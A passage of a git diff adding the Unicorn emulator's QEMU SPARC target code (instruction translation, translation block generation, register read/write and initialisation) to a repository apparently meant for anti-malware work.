alignment check */ + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + lo = gen_load_gpr(dc, rd + 1); + + t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_tl_i64(tcg_ctx, t64, lo, cpu_val); + tcg_gen_qemu_st64(dc->uc, t64, cpu_addr, dc->mem_idx); + tcg_temp_free_i64(tcg_ctx, t64); + } + break; +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + case 0x14: /* sta, V9 stwa, store word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 4); + dc->npc = DYNAMIC_PC; + break; + case 0x15: /* stba, store byte alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 1); + dc->npc = DYNAMIC_PC; + break; + case 0x16: /* stha, store halfword alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 2); + dc->npc = DYNAMIC_PC; + break; + case 0x17: /* stda, store double word alternate */ +#ifndef TARGET_SPARC64 + if (IS_IMM) + goto illegal_insn; + if (!supervisor(dc)) + goto priv_insn; +#endif + if (rd & 1) + goto illegal_insn; + else { + save_state(dc); + gen_stda_asi(dc, cpu_val, cpu_addr, insn, rd); + } + break; +#endif +#ifdef TARGET_SPARC64 + case 0x0e: /* V9 stx */ + gen_address_mask(dc, cpu_addr); + tcg_gen_qemu_st64(dc->uc, cpu_val, cpu_addr, dc->mem_idx); + break; + case 0x1e: /* V9 stxa */ + save_state(dc); + gen_st_asi(dc, cpu_val, cpu_addr, insn, 8); + dc->npc = DYNAMIC_PC; + break; +#endif + default: + goto illegal_insn; + } + } else if (xop > 0x23 && xop < 0x28) { + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + save_state(dc); + switch (xop) { + case 0x24: /* stf, store fpreg */ + { + TCGv t = get_temp_tl(dc); + gen_address_mask(dc, cpu_addr); + cpu_src1_32 = gen_load_fpr_F(dc, rd); + tcg_gen_ext_i32_tl(tcg_ctx, t, cpu_src1_32); + tcg_gen_qemu_st32(dc->uc, t, cpu_addr, dc->mem_idx); + } + break; + case 0x25: /* stfsr, V9 stxfsr */ + { + TCGv t = get_temp_tl(dc); + + tcg_gen_ld_tl(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUSPARCState, fsr)); +#ifdef TARGET_SPARC64 + gen_address_mask(dc, cpu_addr); + if (rd == 1) { + tcg_gen_qemu_st64(dc->uc, t, cpu_addr, dc->mem_idx); + break; + } +#endif + tcg_gen_qemu_st32(dc->uc, t, cpu_addr, dc->mem_idx); + } + break; + case 0x26: +#ifdef TARGET_SPARC64 + /* V9 stqf, store quad fpreg */ + { + TCGv_i32 r_const; + + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_op_load_fpr_QT0(dc, QFPREG(rd)); + r_const = tcg_const_i32(tcg_ctx, dc->mem_idx); + gen_address_mask(dc, cpu_addr); + gen_helper_stqf(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + } + break; +#else /* !TARGET_SPARC64 */ + /* stdfq, store floating point queue */ +#if defined(CONFIG_USER_ONLY) + goto illegal_insn; +#else + if (!supervisor(dc)) + goto priv_insn; + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + goto nfq_insn; +#endif +#endif + case 0x27: /* stdf, store double fpreg */ + gen_address_mask(dc, cpu_addr); + cpu_src1_64 = gen_load_fpr_D(dc, rd); + tcg_gen_qemu_st64(dc->uc, cpu_src1_64, cpu_addr, dc->mem_idx); + break; + default: + goto illegal_insn; + } + } else if (xop > 0x33 && xop < 0x3f) { + save_state(dc); + switch (xop) { +#ifdef TARGET_SPARC64 + case 0x34: /* V9 stfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_stf_asi(dc, cpu_addr, insn, 4, rd); + break; + case 0x36: /* V9 stqfa */ + { + TCGv_i32 r_const; + + CHECK_FPU_FEATURE(dc, FLOAT128); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + r_const = tcg_const_i32(tcg_ctx, 7); + gen_helper_check_align(tcg_ctx, tcg_ctx->cpu_env, cpu_addr, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + gen_stf_asi(dc, cpu_addr, insn, 16, QFPREG(rd)); + } + break; + case 0x37: /* V9 stdfa */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_stf_asi(dc, cpu_addr, insn, 8, DFPREG(rd)); + break; + case 0x3e: /* V9 casxa */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_casx_asi(dc, cpu_addr, cpu_src2, insn, rd); + break; +#else + case 0x34: /* stc */ + case 0x35: /* stcsr */ + case 0x36: /* stdcq */ + case 0x37: /* stdc */ + goto ncp_insn; +#endif +#if !defined(CONFIG_USER_ONLY) || defined(TARGET_SPARC64) + case 0x3c: /* V9 or LEON3 casa */ +#ifndef TARGET_SPARC64 + CHECK_IU_FEATURE(dc, CASA); + if (IS_IMM) { + goto illegal_insn; + } + if (!supervisor(dc)) { + goto priv_insn; + } +#endif + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_cas_asi(dc, cpu_addr, cpu_src2, insn, rd); + break; +#endif + default: + goto illegal_insn; + } + } else { + goto illegal_insn; + } + } + break; + } + /* default case for non jump instructions */ + if (dc->npc == DYNAMIC_PC) { + dc->pc = DYNAMIC_PC; + gen_op_next_insn(dc); + } else if (dc->npc == JUMP_PC) { + /* we can do a static jump */ + gen_branch2(dc, dc->jump_pc[0], dc->jump_pc[1], *(TCGv *)tcg_ctx->cpu_cond); + dc->is_br = 1; + } else { + dc->pc = dc->npc; + dc->npc = dc->npc + 4; + } + jmp_insn: + goto egress; + illegal_insn: + { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_ILL_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; + unimp_flush: + { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_UNIMP_FLUSH); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; +#if !defined(CONFIG_USER_ONLY) + priv_insn: + { + TCGv_i32 r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_PRIV_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free_i32(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; +#endif + nfpu_insn: + save_state(dc); + gen_op_fpexception_im(dc, FSR_FTT_UNIMPFPOP); + dc->is_br = 1; + goto egress; +#if !defined(CONFIG_USER_ONLY) && !defined(TARGET_SPARC64) + nfq_insn: + save_state(dc); + gen_op_fpexception_im(dc, FSR_FTT_SEQ_ERROR); + dc->is_br = 1; + goto egress; +#endif +#ifndef TARGET_SPARC64 + ncp_insn: + { + TCGv r_const; + + save_state(dc); + r_const = tcg_const_i32(tcg_ctx, TT_NCP_INSN); + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, r_const); + tcg_temp_free(tcg_ctx, r_const); + dc->is_br = 1; + } + goto egress; +#endif + egress: + if (dc->n_t32 != 0) { + int i; + for (i = dc->n_t32 - 1; i >= 0; --i) { + tcg_temp_free_i32(tcg_ctx, dc->t32[i]); + } + dc->n_t32 = 0; + } + if (dc->n_ttl != 0) { + int i; + for (i = dc->n_ttl - 1; i >= 0; --i) { + tcg_temp_free(tcg_ctx, dc->ttl[i]); + } + dc->n_ttl = 0; + } +} + +static inline void gen_intermediate_code_internal(SPARCCPU *cpu, + TranslationBlock *tb, + bool spc) +{ + CPUState *cs = CPU(cpu); + CPUSPARCState *env = &cpu->env; + target_ulong pc_start, last_pc; + uint16_t *gen_opc_end; + DisasContext dc1, *dc = &dc1; + CPUBreakpoint *bp; + int j, lj = -1; + int num_insns = 0; + int max_insns; + unsigned int insn; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + bool block_full = false; + + memset(dc, 0, sizeof(DisasContext)); + dc->uc = env->uc; + dc->tb = tb; + pc_start = tb->pc; + dc->pc = pc_start; + last_pc = dc->pc; + dc->npc = (target_ulong) tb->cs_base; + dc->cc_op = CC_OP_DYNAMIC; + dc->mem_idx = cpu_mmu_index(env); + dc->def = env->def; + dc->fpu_enabled = tb_fpu_enabled(tb->flags); + dc->address_mask_32bit = tb_am_enabled(tb->flags); + dc->singlestep = (cs->singlestep_enabled); // || singlestep); + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + + // early check to see if the address of this block is the until address + if (pc_start == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + goto done_generating; + } + + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + + // Unicorn: early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + gen_tb_start(tcg_ctx); + save_state(dc); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + goto done_generating; + } + + // Unicorn: trace this block on request + // Only hook this block if it is not broken from previous translation due to + // full translation cache + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + // save block address to see if we need to patch block size later + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } + + gen_tb_start(tcg_ctx); + do { + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == dc->pc) { + if (dc->pc != pc_start) + save_state(dc); + gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; + goto exit_gen_loop; + } + } + } + if (spc) { + qemu_log("Search PC...\n"); + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + tcg_ctx->gen_opc_pc[lj] = dc->pc; + tcg_ctx->gen_opc_npc[lj] = dc->npc; + tcg_ctx->gen_opc_instr_start[lj] = 1; + tcg_ctx->gen_opc_icount[lj] = num_insns; + } + } + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + // Unicorn: end address tells us to stop emulation + if (dc->pc == dc->uc->addr_end) { + save_state(dc); + gen_helper_power_down(tcg_ctx, tcg_ctx->cpu_env); + break; + } else { + last_pc = dc->pc; + insn = cpu_ldl_code(env, dc->pc); + } + + disas_sparc_insn(dc, insn, true); + num_insns++; + + if (dc->is_br) + break; + /* if the next PC is different, we abort now */ + if (dc->pc != (last_pc + 4)) + break; + + /* if we reach a page boundary, we stop generation so that the + PC of a TT_TFAULT exception is always in the right page */ + if ((dc->pc & (TARGET_PAGE_SIZE - 1)) == 0) + break; + /* if single step mode, we generate only one instruction and + generate an exception */ + if (dc->singlestep) { + break; + } + } while ((tcg_ctx->gen_opc_ptr < gen_opc_end) && + (dc->pc - pc_start) < (TARGET_PAGE_SIZE - 32) && + num_insns < max_insns); + + /* if too long translation, save this info */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || num_insns >= max_insns) + block_full = true; + + exit_gen_loop: + //if (tb->cflags & CF_LAST_IO) { + // gen_io_end(); + //} + if (!dc->is_br) { + if (dc->pc != DYNAMIC_PC && + (dc->npc != DYNAMIC_PC && dc->npc != JUMP_PC)) { + /* static PC and NPC: we can use direct chaining */ + gen_goto_tb(dc, 0, dc->pc, dc->npc); + } else { + if (dc->pc != DYNAMIC_PC) { + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->sparc_cpu_pc, dc->pc); + } + save_npc(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + } + } + +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + if (spc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; +#if 0 + log_page_dump(); +#endif + tcg_ctx->gen_opc_jump_pc[0] = dc->jump_pc[0]; + tcg_ctx->gen_opc_jump_pc[1] = dc->jump_pc[1]; + } else { + tb->size = last_pc + 4 - pc_start; + tb->icount = num_insns; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUSPARCState * env, TranslationBlock * tb) +{ + gen_intermediate_code_internal(sparc_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUSPARCState * env, TranslationBlock * tb) +{ + gen_intermediate_code_internal(sparc_env_get_cpu(env), tb, true); +} + +void gen_intermediate_code_init(CPUSPARCState *env) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + struct uc_struct *uc = env->uc; + unsigned int i; + static const char * const gregnames[8] = { + NULL, // g0 not used + "g1", + "g2", + "g3", + "g4", + "g5", + "g6", + "g7", + }; + static const char * const fregnames[32] = { + "f0", "f2", "f4", "f6", "f8", "f10", "f12", "f14", + "f16", "f18", "f20", "f22", "f24", "f26", "f28", "f30", + "f32", "f34", "f36", "f38", "f40", "f42", "f44", "f46", + "f48", "f50", "f52", "f54", "f56", "f58", "f60", "f62", + }; + + /* init various static tables */ + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(tcg_ctx, TCG_AREG0, "env"); + tcg_ctx->cpu_regwptr = tcg_global_mem_new_ptr(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, regwptr), + "regwptr"); +#ifdef TARGET_SPARC64 + tcg_ctx->cpu_xcc = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, xcc), + "xcc"); + tcg_ctx->cpu_asi = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, asi), + "asi"); + tcg_ctx->cpu_fprs = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, fprs), + "fprs"); + + if (!uc->init_tcg) + tcg_ctx->cpu_gsr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_gsr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, gsr), + "gsr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_tick_cmpr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_tick_cmpr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, tick_cmpr), + "tick_cmpr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_stick_cmpr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_stick_cmpr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, stick_cmpr), + "stick_cmpr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_hstick_cmpr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_hstick_cmpr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, hstick_cmpr), + "hstick_cmpr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_hintp = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_hintp = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, hintp), + "hintp"); + + if (!uc->init_tcg) + tcg_ctx->cpu_htba = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_htba = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, htba), + "htba"); + + if (!uc->init_tcg) + tcg_ctx->cpu_hver = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_hver = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, hver), + "hver"); + + if (!uc->init_tcg) + tcg_ctx->cpu_ssr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_ssr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, ssr), "ssr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_ver = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_ver = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, version), "ver"); + + tcg_ctx->cpu_softint = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, softint), + "softint"); +#else + if (!uc->init_tcg) + tcg_ctx->cpu_wim = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_wim = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, wim), + "wim"); +#endif + + if (!uc->init_tcg) + tcg_ctx->cpu_cond = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_cond = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cond), + "cond"); + + if (!uc->init_tcg) + tcg_ctx->cpu_cc_src = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_src) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cc_src), + "cc_src"); + + if (!uc->init_tcg) + tcg_ctx->cpu_cc_src2 = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_src2) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, cc_src2), + "cc_src2"); + + if (!uc->init_tcg) + tcg_ctx->cpu_cc_dst = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_cc_dst = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cc_dst), + "cc_dst"); + + tcg_ctx->cpu_cc_op = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, cc_op), + "cc_op"); + tcg_ctx->cpu_psr = tcg_global_mem_new_i32(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, psr), + "psr"); + + if (!uc->init_tcg) + tcg_ctx->cpu_fsr = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_fsr) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, fsr), + "fsr"); + + if (!uc->init_tcg) + tcg_ctx->sparc_cpu_pc = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->sparc_cpu_pc = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, pc), + "pc"); + + if (!uc->init_tcg) + tcg_ctx->cpu_npc = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_npc = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, npc), + "npc"); + + if (!uc->init_tcg) + tcg_ctx->cpu_y = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_y = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, y), "y"); +#ifndef CONFIG_USER_ONLY + if (!uc->init_tcg) + tcg_ctx->cpu_tbr = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_tbr = tcg_global_mem_new(tcg_ctx, TCG_AREG0, offsetof(CPUSPARCState, tbr), + "tbr"); +#endif + if (!uc->init_tcg) { + for (i = 0; i < 8; i++) { + tcg_ctx->cpu_gregs[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_gregs[i]) = tcg_global_mem_new(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, gregs[i]), + gregnames[i]); + } + } + + for (i = 0; i < TARGET_DPREGS; i++) { + tcg_ctx->cpu_fpr[i] = tcg_global_mem_new_i64(tcg_ctx, TCG_AREG0, + offsetof(CPUSPARCState, fpr[i]), + fregnames[i]); + } + + uc->init_tcg = true; +} + +void restore_state_to_opc(CPUSPARCState *env, TranslationBlock *tb, int pc_pos) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + target_ulong npc; + npc = tcg_ctx->gen_opc_npc[pc_pos]; + if (npc == 1) { + /* dynamic NPC: already stored */ + } else if (npc == 2) { + /* jump PC: use 'cond' and the jump targets of the translation */ + if (env->cond) { + env->npc = tcg_ctx->gen_opc_jump_pc[0]; + } else { + env->npc = tcg_ctx->gen_opc_jump_pc[1]; + } + } else { + env->npc = npc; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.c new file mode 100644 index 0000000..8db2b52 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.c @@ -0,0 +1,151 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/sparc/sparc.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int SPARC_REGS_STORAGE_SIZE = offsetof(CPUSPARCState, tlb_table); + +static bool sparc_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case TT_ILL_INSN: + return true; + } +} + +static void sparc_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUSPARCState *)uc->current_cpu->env_ptr)->pc = address; + ((CPUSPARCState *)uc->current_cpu->env_ptr)->npc = address + 4; +} + +void sparc_release(void *ctx); +void sparc_release(void *ctx) +{ + int i; + TCGContext *tcg_ctx = (TCGContext *) ctx; + release_common(ctx); + g_free(tcg_ctx->cpu_wim); + g_free(tcg_ctx->cpu_cond); + g_free(tcg_ctx->cpu_cc_src); + g_free(tcg_ctx->cpu_cc_src2); + g_free(tcg_ctx->cpu_cc_dst); + g_free(tcg_ctx->cpu_fsr); + g_free(tcg_ctx->sparc_cpu_pc); + g_free(tcg_ctx->cpu_npc); + g_free(tcg_ctx->cpu_y); + g_free(tcg_ctx->cpu_tbr); + + for (i = 0; i < 8; i++) { + g_free(tcg_ctx->cpu_gregs[i]); + } + for (i = 0; i < 32; i++) { + g_free(tcg_ctx->cpu_gpr[i]); + } + + g_free(tcg_ctx->cpu_PC); + g_free(tcg_ctx->btarget); + g_free(tcg_ctx->bcond); + g_free(tcg_ctx->cpu_dspctrl); + + g_free(tcg_ctx->tb_ctx.tbs); +} + +void sparc_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + memset(env->gregs, 0, sizeof(env->gregs)); + memset(env->fpr, 0, sizeof(env->fpr)); + memset(env->regbase, 0, sizeof(env->regbase)); + + env->pc = 0; + env->npc = 0; + env->regwptr = env->regbase; +} + +int sparc_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0]; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0]; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0]; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0]; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + *(int32_t *)value = SPARC_CPU(uc, mycpu)->env.pc; + break; + } + } + } + + return 0; +} + +int sparc_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + const void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0] = *(uint32_t *)value; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0] = *(uint32_t *)value; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0] = *(uint32_t *)value; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - UC_SPARC_REG_I0] = *(uint32_t *)value; + else { + switch(regid) { + default: break; + case UC_SPARC_REG_PC: + SPARC_CPU(uc, mycpu)->env.pc = *(uint32_t *)value; + SPARC_CPU(uc, mycpu)->env.npc = *(uint32_t *)value + 4; + // force to quit execution and flush TB + uc->quit_request = true; + uc_emu_stop(uc); + break; + } + } + } + + return 0; +} + +DEFAULT_VISIBILITY +void sparc_uc_init(struct uc_struct* uc) +{ + register_accel_types(uc); + sparc_cpu_register_types(uc); + leon3_machine_init(uc); + uc->release = sparc_release; + uc->reg_read = sparc_reg_read; + uc->reg_write = sparc_reg_write; + uc->reg_reset = sparc_reg_reset; + uc->set_pc = sparc_set_pc; + uc->stop_interrupt = sparc_stop_interrupt; + uc_common_init(uc); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.h new file mode 100644 index 0000000..2140f28 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn.h @@ -0,0 +1,19 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_SPARC_H +#define UC_QEMU_TARGET_SPARC_H + +// functions to read & write registers +int sparc_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int sparc_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void sparc_reg_reset(struct uc_struct *uc); + +void sparc_uc_init(struct uc_struct* uc); +void sparc64_uc_init(struct uc_struct* uc); + +extern const int SPARC_REGS_STORAGE_SIZE; +extern const int SPARC64_REGS_STORAGE_SIZE; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn64.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn64.c new file mode 100644 index 0000000..e6f07a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/unicorn64.c @@ -0,0 +1,115 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/sparc/sparc.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "unicorn_common.h" +#include "uc_priv.h" + + +const int SPARC64_REGS_STORAGE_SIZE = offsetof(CPUSPARCState, tlb_table); + +static bool sparc_stop_interrupt(int intno) +{ + switch(intno) { + default: + return false; + case TT_ILL_INSN: + return true; + } +} + +static void sparc_set_pc(struct uc_struct *uc, uint64_t address) +{ + ((CPUSPARCState *)uc->current_cpu->env_ptr)->pc = address; + ((CPUSPARCState *)uc->current_cpu->env_ptr)->npc = address + 4; +} + +void sparc_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + memset(env->gregs, 0, sizeof(env->gregs)); + memset(env->fpr, 0, sizeof(env->fpr)); + memset(env->regbase, 0, sizeof(env->regbase)); + + env->pc = 0; + env->npc = 0; + env->regwptr = env->regbase; +} + +int sparc_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + if (regid >= UC_SPARC_REG_G0 && regid <= UC_SPARC_REG_G7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.gregs[regid - UC_SPARC_REG_G0]; + else if (regid >= UC_SPARC_REG_O0 && regid <= UC_SPARC_REG_O7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[regid - UC_SPARC_REG_O0]; + else if (regid >= UC_SPARC_REG_L0 && regid <= UC_SPARC_REG_L7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[8 + regid - UC_SPARC_REG_L0]; + else if (regid >= UC_SPARC_REG_I0 && regid <= UC_SPARC_REG_I7) + *(int64_t *)value = SPARC_CPU(uc, mycpu)->env.regwptr[16 + regid - 